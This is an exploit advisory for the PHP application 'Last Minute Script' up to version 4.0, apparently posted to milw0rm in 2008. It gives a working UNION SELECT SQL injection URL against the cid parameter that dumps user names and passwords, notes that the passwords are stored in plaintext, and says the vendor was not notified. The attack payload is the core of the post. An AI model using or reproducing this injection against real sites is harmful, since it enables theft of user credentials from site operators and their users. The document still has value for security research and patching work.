58 lines
No EOL
1.4 KiB
Text
58 lines
No EOL
1.4 KiB
Text
-[*]+================================================================================+[*]-
|
|
-[*]+ Last Minute Script <= 4.0 Remote SQL Injection Vulnerability +[*]-
|
|
-[*]+================================================================================+[*]-
|
|
|
|
|
|
|
|
[*] Discovered By: t0pP8uZz
|
|
[*] Discovered On: 8 JULY 2008
|
|
[*] Script Download: http://www.mole-group.com/content/view/31/45/
|
|
[*] DORK: N/A
|
|
|
|
|
|
|
|
[*] Vendor Has Not Been Notified!
|
|
|
|
|
|
|
|
[*] DESCRIPTION:
|
|
|
|
Last Minute Script 4.0 (and all prior versions) suffer from a multirow SQL injection flaw,
|
|
This allows the remote attacker to execute arbitrary MySQL querys, and possibly gaining access
|
|
to confidential information.
|
|
|
|
below is a example.
|
|
|
|
|
|
|
|
[*] SQL Injection:
|
|
|
|
http://site.com/index.php?cid=-1/**/UNION/**/ALL/**/SELECT/**/CONVERT(CONCAT(name,0x3a,password,0x3C62723E)/**/using/**/latin1),2,3,4/**/FROM/**/users/*
|
|
|
|
|
|
|
|
[*] NOTE/TIP:
|
|
|
|
passwords are in plaintext.
|
|
|
|
There are also other SQL injections around the site which i have found, So no one even bother to post has seperate vulns.
|
|
|
|
|
|
|
|
[*] GREETZ:
|
|
|
|
milw0rm.com, h4ck-y0u.org, Offensive-Security.com, CipherCrew !
|
|
|
|
|
|
|
|
[-] Peace...
|
|
|
|
...t0pP8uZz !
|
|
|
|
|
|
|
|
-[*]+================================================================================+[*]-
|
|
-[*]+ Last Minute Script <= 4.0 Remote SQL Injection Vulnerability +[*]-
|
|
-[*]+================================================================================+[*]-
|
|
|
|
# milw0rm.com [2008-07-08] |